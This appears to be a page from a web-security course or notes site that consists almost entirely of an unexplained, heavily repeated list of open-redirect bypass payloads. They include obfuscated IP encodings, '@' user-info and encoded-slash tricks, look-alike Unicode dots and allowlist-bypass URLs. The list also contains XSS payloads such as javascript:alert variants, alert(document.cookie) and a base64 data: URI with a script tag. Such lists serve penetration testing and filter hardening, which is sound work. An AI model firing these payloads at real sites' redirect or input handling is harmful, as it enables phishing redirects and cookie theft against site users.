http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://example.com@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://example.com@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://example.com@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://example.com@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://example.com@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:example.com@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:example.com@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:example.com@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:example.com@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:example.com@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:example.com@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:example.com@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:example.com@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:example.com@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:example.com@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@example.com
https://:@google.com\@example.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@example.com/
http://google.com:80?@example.com/
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://example.com+&@google.com#+@example.com/
http://google.com\texample.com/
//google.com:80#@example.com/
//google.com:80?@example.com/
//3H6k7lIAiqjfNeN@example.com+@google.com/
//XY>.7d8T\205pZM@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//example.com+&@google.com#+@example.com/
//google.com\texample.com/
//;@google.com
http://;@google.com
@google.com
javascript://https://example.com/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://google.com%2f%2f.example.com/
http://google.com%5c%5c.example.com/
http://google.com%3F.example.com/
http://google.com%23.example.com/
http://example.com:80%40google.com/
http://example.com%2egoogle.com/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5cgoogle.com/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://google.com
/%2f%2fgoogle.com
/google.com/%2f%2e%2e
/http:/google.com
/.google.com
///\;@google.com
///google.com
/////google.com/

PreviousHTML Injection (CWE-79)NextOpen Redirect Vuln Web for Course

Last updated 1 month ago

/%09/bing.com /%2f%2fbing.com /%2f%2f%2fbing.com%2f%3fwww.omise.co /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ /%5cbing.com /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d /.bing.com //%09/bing.com //%5cbing.com ///%09/bing.com ///%5cbing.com ////%09/bing.com ////%5cbing.com /////bing.com /////bing.com/ ////\;@bing.com ////bing.com/ ////bing.com/%2e%2e ////bing.com/%2e%2e%2f ////bing.com/%2f%2e%2e ////bing.com%2f.. ////bing.com// ///bing.com ///bing.com/ //google.com/%2f.. //bing.com@google.com/%2f.. ///google.com/%2f.. ///bing.com@google.com/%2f.. ////google.com/%2f.. ////www.bing.com@google.com/%2f.. https://google.com/%2f.. https://www.bing.com@google.com/%2f.. /https://google.com/%2f.. /https://www.bing.com@google.com/%2f.. //www.google.com/%2f%2e%2e //www.bing.com@www.google.com/%2f%2e%2e ///www.google.com/%2f%2e%2e ///www.bing.com@www.google.com/%2f%2e%2e ////www.google.com/%2f%2e%2e ////www.bing.com@www.google.com/%2f%2e%2e https://www.google.com/%2f%2e%2e https://www.bing.com@www.google.com/%2f%2e%2e /https://www.google.com/%2f%2e%2e /https://www.bing.com@www.google.com/%2f%2e%2e //google.com/ //www.bing.com@google.com/ ///google.com/ ///www.bing.com@google.com/ ////google.com/ ////www.bing.com@google.com/ https://google.com/ https://www.bing.com@google.com/ /https://google.com/ /https://www.bing.com@google.com/ //google.com// //www.bing.com@google.com// ///google.com// ///www.bing.com@google.com// ////google.com// ////www.bing.com@google.com// https://google.com// https://www.bing.com@google.com// //https://google.com// //https://www.bing.com@google.com// //www.google.com/%2e%2e%2f //www.bing.com@www.google.com/%2e%2e%2f ///www.google.com/%2e%2e%2f ///www.bing.com@www.google.com/%2e%2e%2f ////www.google.com/%2e%2e%2f ////www.bing.com@www.google.com/%2e%2e%2f https://www.google.com/%2e%2e%2f https://www.bing.com@www.google.com/%2e%2e%2f //https://www.google.com/%2e%2e%2f //https://www.bing.com@www.google.com/%2e%2e%2f ///www.google.com/%2e%2e ///www.bing.com@www.google.com/%2e%2e ////www.google.com/%2e%2e ////www.bing.com@www.google.com/%2e%2e https:///www.google.com/%2e%2e https:///www.bing.com@www.google.com/%2e%2e //https:///www.google.com/%2e%2e //www.bing.com@https:///www.google.com/%2e%2e /https://www.google.com/%2e%2e /https://www.bing.com@www.google.com/%2e%2e ///www.google.com/%2f%2e%2e ///www.bing.com@www.google.com/%2f%2e%2e ////www.google.com/%2f%2e%2e ////www.bing.com@www.google.com/%2f%2e%2e https:///www.google.com/%2f%2e%2e https:///www.bing.com@www.google.com/%2f%2e%2e /https://www.google.com/%2f%2e%2e /https://www.bing.com@www.google.com/%2f%2e%2e /https:///www.google.com/%2f%2e%2e /https:///www.bing.com@www.google.com/%2f%2e%2e /%09/google.com /%09/www.bing.com@google.com //%09/google.com //%09/www.bing.com@google.com ///%09/google.com ///%09/www.bing.com@google.com ////%09/google.com ////%09/www.bing.com@google.com https://%09/google.com https://%09/www.bing.com@google.com /%5cgoogle.com /%5cwww.bing.com@google.com //%5cgoogle.com //%5cwww.bing.com@google.com ///%5cgoogle.com ///%5cwww.bing.com@google.com ////%5cgoogle.com ////%5cwww.bing.com@google.com https://%5cgoogle.com https://%5cwww.bing.com@google.com /https://%5cgoogle.com /https://%5cwww.bing.com@google.com https://google.com https://www.bing.com@google.com javascript:alert(1); javascript:alert(1) //javascript:alert(1); /javascript:alert(1); //javascript:alert(1) /javascript:alert(1) /%5cjavascript:alert(1); /%5cjavascript:alert(1) //%5cjavascript:alert(1); //%5cjavascript:alert(1) /%09/javascript:alert(1); /%09/javascript:alert(1) java%0d%0ascript%0d%0a:alert(0) //google.com https:google.com //google%E3%80%82com \/\/google.com/ /\/google.com/ //google%00.com https://www.whitelisteddomain.tld/https://www.google.com/ ";alert(0);// javascript://www.whitelisteddomain.tld?%a0alert%281%29 http://0xd8.0x3a.0xd6.0xce http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http://0xd83ad6ce http://www.whitelisteddomain.tld@0xd83ad6ce http://3H6k7lIAiqjfNeN@0xd83ad6ce http://XY>.7d8T\205pZM@0xd83ad6ce http://3627734734 http://www.whitelisteddomain.tld@3627734734 http://3H6k7lIAiqjfNeN@3627734734 http://XY>.7d8T\205pZM@3627734734 http://472.314.470.462 http://www.whitelisteddomain.tld@472.314.470.462 http://3H6k7lIAiqjfNeN@472.314.470.462 http://XY>.7d8T\205pZM@472.314.470.462 http://0330.072.0326.0316 http://www.whitelisteddomain.tld@0330.072.0326.0316 http://3H6k7lIAiqjfNeN@0330.072.0326.0316 http://XY>.7d8T\205pZM@0330.072.0326.0316 http://00330.00072.0000326.00000316 http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 http://[::216.58.214.206] http://www.whitelisteddomain.tld@[::216.58.214.206] http://3H6k7lIAiqjfNeN@[::216.58.214.206] http://XY>.7d8T\205pZM@[::216.58.214.206] http://[::ffff:216.58.214.206] http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 http://00330.3856078 http://www.whitelisteddomain.tld@00330.3856078 http://3H6k7lIAiqjfNeN@00330.3856078 http://XY>.7d8T\205pZM@00330.3856078 http://00330.0x3a.54990 http://www.whitelisteddomain.tld@00330.0x3a.54990 http://3H6k7lIAiqjfNeN@00330.0x3a.54990 http://XY>.7d8T\205pZM@00330.0x3a.54990 http:0xd8.0x3a.0xd6.0xce http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http:0xd83ad6ce http:www.whitelisteddomain.tld@0xd83ad6ce http:3H6k7lIAiqjfNeN@0xd83ad6ce http:XY>.7d8T\205pZM@0xd83ad6ce http:3627734734 http:www.whitelisteddomain.tld@3627734734 http:3H6k7lIAiqjfNeN@3627734734 http:XY>.7d8T\205pZM@3627734734 http:472.314.470.462 http:www.whitelisteddomain.tld@472.314.470.462 http:3H6k7lIAiqjfNeN@472.314.470.462 http:XY>.7d8T\205pZM@472.314.470.462 http:0330.072.0326.0316 http:www.whitelisteddomain.tld@0330.072.0326.0316 http:3H6k7lIAiqjfNeN@0330.072.0326.0316 http:XY>.7d8T\205pZM@0330.072.0326.0316 http:00330.00072.0000326.00000316 http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 http:[::216.58.214.206] http:www.whitelisteddomain.tld@[::216.58.214.206] http:3H6k7lIAiqjfNeN@[::216.58.214.206] http:XY>.7d8T\205pZM@[::216.58.214.206] http:[::ffff:216.58.214.206] http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] http:0xd8.072.54990 http:www.whitelisteddomain.tld@0xd8.072.54990 http:3H6k7lIAiqjfNeN@0xd8.072.54990 http:XY>.7d8T\205pZM@0xd8.072.54990 http:0xd8.3856078 http:www.whitelisteddomain.tld@0xd8.3856078 http:3H6k7lIAiqjfNeN@0xd8.3856078 http:XY>.7d8T\205pZM@0xd8.3856078 http:00330.3856078 http:www.whitelisteddomain.tld@00330.3856078 http:3H6k7lIAiqjfNeN@00330.3856078 http:XY>.7d8T\205pZM@00330.3856078 http:00330.0x3a.54990 http:www.whitelisteddomain.tld@00330.0x3a.54990 http:3H6k7lIAiqjfNeN@00330.0x3a.54990 http:XY>.7d8T\205pZM@00330.0x3a.54990 〱google.com 〵google.com ゝgoogle.com ーgoogle.com ｰgoogle.com /〱google.com /〵google.com /ゝgoogle.com /ーgoogle.com /ｰgoogle.com %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d http://%67%6f%6f%67%6c%65%2e%63%6f%6d <>javascript:alert(1); <>//google.com //google.com\@www.whitelisteddomain.tld https://:@google.com\@www.whitelisteddomain.tld \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) ja\nva\tscript\r:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) \152\141\166\141\163\143\162\151\160\164\072alert(1) http://google.com:80#@www.whitelisteddomain.tld/ http://google.com:80?@www.whitelisteddomain.tld/ ///example.com/%2e%2e ///example.com/%2e%2e%2f ///example.com/%2f%2e%2e ///example.com/%2f.. ///example.com// //example.com //example.com/ //example.com/%2e%2e //example.com/%2e%2e%2f //example.com/%2f%2e%2e //example.com/%2f.. //example.com// //google%00.com //google%E3%80%82com //https:///example.com/%2e%2e //https://example.com/%2e%2e%2f //https://example.com// /<>//example.com /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com /\/\/example.com/ /\/example.com/ /example.com/%2f%2e%2e /http://%67%6f%6f%67%6c%65%2e%63%6f%6d /http://example.com /http:/example.com /https:/%5cexample.com/ /https://%09/example.com /https://%5cexample.com /https:///example.com/%2e%2e /https:///example.com/%2f%2e%2e /https://example.com /https://example.com/ /https://example.com/%2e%2e /https://example.com/%2e%2e%2f /https://example.com/%2f%2e%2e /https://example.com/%2f.. /https://example.com// /https:example.com /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com //%2fxgoogle.com /ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org //localdomain.pw/%2f.. //www.whitelisteddomain.tld@localdomain.pw/%2f.. ///localdomain.pw/%2f.. ///www.whitelisteddomain.tld@localdomain.pw/%2f.. ////localdomain.pw/%2f.. ////www.whitelisteddomain.tld@localdomain.pw/%2f.. https://localdomain.pw/%2f.. https://www.whitelisteddomain.tld@localdomain.pw/%2f.. /https://localdomain.pw/%2f.. /https://www.whitelisteddomain.tld@localdomain.pw/%2f.. //localdomain.pw/%2f%2e%2e //www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e ///localdomain.pw/%2f%2e%2e ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e ////localdomain.pw/%2f%2e%2e ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e https://localdomain.pw/%2f%2e%2e https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e /https://localdomain.pw/%2f%2e%2e /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e //localdomain.pw/ //www.whitelisteddomain.tld@localdomain.pw/ ///localdomain.pw/ ///www.whitelisteddomain.tld@localdomain.pw/ ////localdomain.pw/ ////www.whitelisteddomain.tld@localdomain.pw/ https://localdomain.pw/ https://www.whitelisteddomain.tld@localdomain.pw/ /https://localdomain.pw/ /https://www.whitelisteddomain.tld@localdomain.pw/ //localdomain.pw// //www.whitelisteddomain.tld@localdomain.pw// ///localdomain.pw// ///www.whitelisteddomain.tld@localdomain.pw// ////localdomain.pw// ////www.whitelisteddomain.tld@localdomain.pw// https://localdomain.pw// https://www.whitelisteddomain.tld@localdomain.pw// //https://localdomain.pw// //https://www.whitelisteddomain.tld@localdomain.pw// //localdomain.pw/%2e%2e%2f //www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f ///localdomain.pw/%2e%2e%2f ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f ////localdomain.pw/%2e%2e%2f ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f https://localdomain.pw/%2e%2e%2f https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f //https://localdomain.pw/%2e%2e%2f //https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f ///localdomain.pw/%2e%2e ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e ////localdomain.pw/%2e%2e ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e https:///localdomain.pw/%2e%2e https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e //https:///localdomain.pw/%2e%2e //www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e /https://localdomain.pw/%2e%2e /https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e ///localdomain.pw/%2f%2e%2e ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e ////localdomain.pw/%2f%2e%2e ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e https:///localdomain.pw/%2f%2e%2e https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e /https://localdomain.pw/%2f%2e%2e /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e /https:///localdomain.pw/%2f%2e%2e /https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e /%09/localdomain.pw /%09/www.whitelisteddomain.tld@localdomain.pw //%09/localdomain.pw //%09/www.whitelisteddomain.tld@localdomain.pw ///%09/localdomain.pw ///%09/www.whitelisteddomain.tld@localdomain.pw ////%09/localdomain.pw ////%09/www.whitelisteddomain.tld@localdomain.pw https://%09/localdomain.pw https://%09/www.whitelisteddomain.tld@localdomain.pw /%5clocaldomain.pw /%5cwww.whitelisteddomain.tld@localdomain.pw //%5clocaldomain.pw //%5cwww.whitelisteddomain.tld@localdomain.pw ///%5clocaldomain.pw ///%5cwww.whitelisteddomain.tld@localdomain.pw ////%5clocaldomain.pw ////%5cwww.whitelisteddomain.tld@localdomain.pw https://%5clocaldomain.pw https://%5cwww.whitelisteddomain.tld@localdomain.pw /https://%5clocaldomain.pw /https://%5cwww.whitelisteddomain.tld@localdomain.pw https://localdomain.pw https://www.whitelisteddomain.tld@localdomain.pw javascript:alert(1); javascript:alert(1) //javascript:alert(1); /javascript:alert(1); //javascript:alert(1) /javascript:alert(1) /%5cjavascript:alert(1); /%5cjavascript:alert(1) //%5cjavascript:alert(1); //%5cjavascript:alert(1) /%09/javascript:alert(1); /%09/javascript:alert(1) java%0d%0ascript%0d%0a:alert(0) //localdomain.pw https:localdomain.pw //localdomain%E3%80%82pw \/\/localdomain.pw/ /\/localdomain.pw/ /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ //localdomain%00.pw https://www.whitelisteddomain.tld/https://localdomain.pw/ ";alert(0);// javascript://www.whitelisteddomain.tld?%a0alert%281%29 http://0xd8.0x3a.0xd6.0xce http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http://0xd83ad6ce http://www.whitelisteddomain.tld@0xd83ad6ce http://3H6k7lIAiqjfNeN@0xd83ad6ce http://XY>.7d8T\205pZM@0xd83ad6ce http://3627734734 http://www.whitelisteddomain.tld@3627734734 http://3H6k7lIAiqjfNeN@3627734734 http://XY>.7d8T\205pZM@3627734734 http://472.314.470.462 http://www.whitelisteddomain.tld@472.314.470.462 http://3H6k7lIAiqjfNeN@472.314.470.462 http://XY>.7d8T\205pZM@472.314.470.462 http://0330.072.0326.0316 http://www.whitelisteddomain.tld@0330.072.0326.0316 http://3H6k7lIAiqjfNeN@0330.072.0326.0316 http://XY>.7d8T\205pZM@0330.072.0326.0316 http://00330.00072.0000326.00000316 http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 http://[::216.58.214.206] http://www.whitelisteddomain.tld@[::216.58.214.206] http://3H6k7lIAiqjfNeN@[::216.58.214.206] http://XY>.7d8T\205pZM@[::216.58.214.206] http://[::ffff:216.58.214.206] http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 http://00330.3856078 http://www.whitelisteddomain.tld@00330.3856078 http://3H6k7lIAiqjfNeN@00330.3856078 http://XY>.7d8T\205pZM@00330.3856078 http://00330.0x3a.54990 http://www.whitelisteddomain.tld@00330.0x3a.54990 http://3H6k7lIAiqjfNeN@00330.0x3a.54990 http://XY>.7d8T\205pZM@00330.0x3a.54990 http:0xd8.0x3a.0xd6.0xce http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http:0xd83ad6ce http:www.whitelisteddomain.tld@0xd83ad6ce http:3H6k7lIAiqjfNeN@0xd83ad6ce http:XY>.7d8T\205pZM@0xd83ad6ce http:3627734734 http:www.whitelisteddomain.tld@3627734734 http:3H6k7lIAiqjfNeN@3627734734 http:XY>.7d8T\205pZM@3627734734 http:472.314.470.462 http:www.whitelisteddomain.tld@472.314.470.462 http:3H6k7lIAiqjfNeN@472.314.470.462 http:XY>.7d8T\205pZM@472.314.470.462 http:0330.072.0326.0316 http:www.whitelisteddomain.tld@0330.072.0326.0316 http:3H6k7lIAiqjfNeN@0330.072.0326.0316 http:XY>.7d8T\205pZM@0330.072.0326.0316 http:00330.00072.0000326.00000316 http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 http:[::216.58.214.206] http:www.whitelisteddomain.tld@[::216.58.214.206] http:3H6k7lIAiqjfNeN@[::216.58.214.206] http:XY>.7d8T\205pZM@[::216.58.214.206] http:[::ffff:216.58.214.206] http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] http:0xd8.072.54990 http:www.whitelisteddomain.tld@0xd8.072.54990 http:3H6k7lIAiqjfNeN@0xd8.072.54990 http:XY>.7d8T\205pZM@0xd8.072.54990 http:0xd8.3856078 http:www.whitelisteddomain.tld@0xd8.3856078 http:3H6k7lIAiqjfNeN@0xd8.3856078 http:XY>.7d8T\205pZM@0xd8.3856078 http:00330.3856078 http:www.whitelisteddomain.tld@00330.3856078 http:3H6k7lIAiqjfNeN@00330.3856078 http:XY>.7d8T\205pZM@00330.3856078 http:00330.0x3a.54990 http:www.whitelisteddomain.tld@00330.0x3a.54990 http:3H6k7lIAiqjfNeN@00330.0x3a.54990 http:XY>.7d8T\205pZM@00330.0x3a.54990 〱localdomain.pw 〵localdomain.pw ゝlocaldomain.pw ーlocaldomain.pw ｰlocaldomain.pw /〱localdomain.pw /〵localdomain.pw /ゝlocaldomain.pw /ーlocaldomain.pw /ｰlocaldomain.pw %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d http://%67%6f%6f%67%6c%65%2e%63%6f%6d <>javascript:alert(1); <>//localdomain.pw //localdomain.pw\@www.whitelisteddomain.tld https://:@localdomain.pw\@www.whitelisteddomain.tld \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) ja\nva\tscript\r:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) \152\141\166\141\163\143\162\151\160\164\072alert(1) http://localdomain.pw:80#@www.whitelisteddomain.tld/ http://localdomain.pw:80?@www.whitelisteddomain.tld/ http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ http://localdomain.pw\twww.whitelisteddomain.tld/ //localdomain.pw:80#@www.whitelisteddomain.tld/ //localdomain.pw:80?@www.whitelisteddomain.tld/ //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ //XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ //www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ //localdomain.pw\twww.whitelisteddomain.tld/ //;@localdomain.pw http://;@localdomain.pw @localdomain.pw javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1) data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/ http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/ http://localdomain.pw%3F.www.whitelisteddomain.tld/ http://localdomain.pw%23.www.whitelisteddomain.tld/ http://www.whitelisteddomain.tld:80%40localdomain.pw/ http://www.whitelisteddomain.tld%2elocaldomain.pw/ /x:1/:///%01javascript:alert(document.cookie)/ /https:/%5clocaldomain.pw/ javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) /http://localdomain.pw /%2f%2flocaldomain.pw /localdomain.pw/%2f%2e%2e /http:/localdomain.pw /.localdomain.pw http://.localdomain.pw .localdomain.pw ///\;@localdomain.pw ///localdomain.pw /////localdomain.pw/ /////localdomain.pw java%0ascript:alert(1) java%09script:alert(1) java%0dscript:alert(1) javascript://%0aalert(1) Javas%26%2399;ript:alert(1) data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html> jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);// http://www.localdomain.pw\.www.whitelisteddomain.tld %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529 //example.com@google.com/%2f.. ///google.com/%2f.. ///example.com@google.com/%2f.. ////google.com/%2f.. ////example.com@google.com/%2f.. https://google.com/%2f.. https://example.com@google.com/%2f.. /https://google.com/%2f.. /https://example.com@google.com/%2f.. //google.com/%2f%2e%2e //example.com@google.com/%2f%2e%2e ///google.com/%2f%2e%2e ///example.com@google.com/%2f%2e%2e ////google.com/%2f%2e%2e ////example.com@google.com/%2f%2e%2e https://google.com/%2f%2e%2e https://example.com@google.com/%2f%2e%2e /https://google.com/%2f%2e%2e /https://example.com@google.com/%2f%2e%2e //google.com/ //example.com@google.com/ ///google.com/ ///example.com@google.com/ ////google.com/ ////example.com@google.com/ https://google.com/ https://example.com@google.com/ /https://google.com/ /https://example.com@google.com/ //google.com// //example.com@google.com// ///google.com// ///example.com@google.com// ////google.com// ////example.com@google.com// https://google.com// https://example.com@google.com// //https://google.com// //https://example.com@google.com// //google.com/%2e%2e%2f //example.com@google.com/%2e%2e%2f ///google.com/%2e%2e%2f ///example.com@google.com/%2e%2e%2f 